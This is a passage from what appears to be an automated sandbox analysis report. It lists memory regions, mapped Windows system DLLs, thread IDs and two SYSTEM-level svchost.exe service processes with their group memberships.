filename = "" Region: id = 38407 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38408 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38425 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 38426 start_va = 0x2d00000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 38427 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 1129 os_tid = 0x300 Thread: id = 1130 os_tid = 0x308 Thread: id = 1131 os_tid = 0x30c Thread: id = 1133 os_tid = 0x310 Thread: id = 1134 os_tid = 0x314 Thread: id = 1135 os_tid = 0x318 Thread: id = 1137 os_tid = 0x320 Thread: id = 1138 os_tid = 0x324 Thread: id = 1139 os_tid = 0x328 Thread: id = 1199 os_tid = 0x428 Process: id = "674" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d11a0" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" 
[0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b80a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37754 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 37755 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37756 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37757 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37758 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37759 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37760 
start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37771 start_va = 0x1d0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 37772 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37773 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37774 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37776 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37777 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37778 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37779 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = 
mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37780 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37781 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37782 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37783 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37784 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37785 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37786 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37787 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37788 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37789 start_va = 0x1d0000 end_va = 0x1ecfff entry_point = 0x1d0000 
region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37790 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37791 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37792 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 37793 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 37794 start_va = 0x250000 end_va = 0x256fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37795 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 37796 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37797 start_va = 0x490000 end_va = 0x882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 37798 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 37799 start_va = 0x8a0000 end_va = 0x8fbfff entry_point = 0x8a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37800 start_va = 0x8a0000 end_va = 0x8fbfff entry_point = 0x8a0000 region_type = mapped_file name = 
"rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37801 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37811 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 37812 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37813 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37832 start_va = 0x980000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 37833 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37838 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 37839 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37842 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 37843 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37844 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffda000" filename = "" Region: id = 37845 start_va = 0x74250000 end_va = 0x742c9fff entry_point = 0x74250000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 37846 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37847 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37848 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37849 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37850 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37851 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37852 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37853 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = 
mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 37898 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 37899 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 37900 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37901 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37902 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 37903 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 37904 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37908 start_va = 0x900000 end_va = 0x900fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 37909 start_va = 0x910000 end_va = 0x910fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 37910 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 37915 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 37916 start_va = 0x7ffd8000 end_va = 0x7ffd8fff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37921 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 37922 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37923 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 37924 start_va = 0x920000 end_va = 0x920fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 37925 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37926 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38027 start_va = 0x9c0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 38028 start_va = 0x74160000 end_va = 0x741e7fff entry_point = 0x74160000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 38029 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38030 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38031 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38032 start_va = 
0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 38033 start_va = 0x74130000 end_va = 0x74154fff entry_point = 0x74130000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 38034 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 38037 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 38038 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38061 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 38062 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 38063 start_va = 0x73fb0000 end_va = 0x7402cfff entry_point = 0x73fb0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 38064 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38065 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 38066 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: 
"c:\\windows\\system32\\sspicli.dll") Region: id = 38067 start_va = 0x10d0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 38068 start_va = 0x73f70000 end_va = 0x73fa4fff entry_point = 0x73f70000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 38079 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 38080 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 38081 start_va = 0x8d0000 end_va = 0x8d0fff entry_point = 0x8d0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38084 start_va = 0x8e0000 end_va = 0x8e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 38085 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38086 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38087 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" 
(normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38088 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38089 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38090 start_va = 0x920000 end_va = 0x95bfff entry_point = 0x920000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38091 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38092 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38128 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 38129 start_va = 0x11e0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 38130 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38131 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38132 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: 
"c:\\windows\\system32\\wtsapi32.dll") Region: id = 38133 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38134 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 38170 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 38171 start_va = 0x1290000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 38172 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 38173 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38811 start_va = 0x1320000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 38812 start_va = 0x71210000 end_va = 0x7121afff entry_point = 0x71210000 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 38813 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 38814 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 38815 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Thread: id = 1141 os_tid = 0x330 Thread: id = 1142 os_tid = 0x338 Thread: id = 1147 
os_tid = 0x34c Thread: id = 1149 os_tid = 0x354 Thread: id = 1150 os_tid = 0x358 Thread: id = 1152 os_tid = 0x364 Thread: id = 1154 os_tid = 0x36c Thread: id = 1155 os_tid = 0x370 Thread: id = 1159 os_tid = 0x380 Thread: id = 1160 os_tid = 0x384 Thread: id = 1172 os_tid = 0x3b8 Thread: id = 1173 os_tid = 0x3bc Thread: id = 1178 os_tid = 0x3d0 Thread: id = 1179 os_tid = 0x3d4 Thread: id = 1181 os_tid = 0x3dc Thread: id = 1182 os_tid = 0x3e0 Thread: id = 1188 os_tid = 0x3fc Thread: id = 1189 os_tid = 0x400 Thread: id = 1225 os_tid = 0x49c Thread: id = 1226 os_tid = 0x4a0 Process: id = "675" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d11c0" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c468" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37854 start_va = 0x10000 end_va = 
0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37855 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 37856 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 37857 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37858 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37859 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37861 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37863 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 37866 start_va = 0x90000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37867 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = 
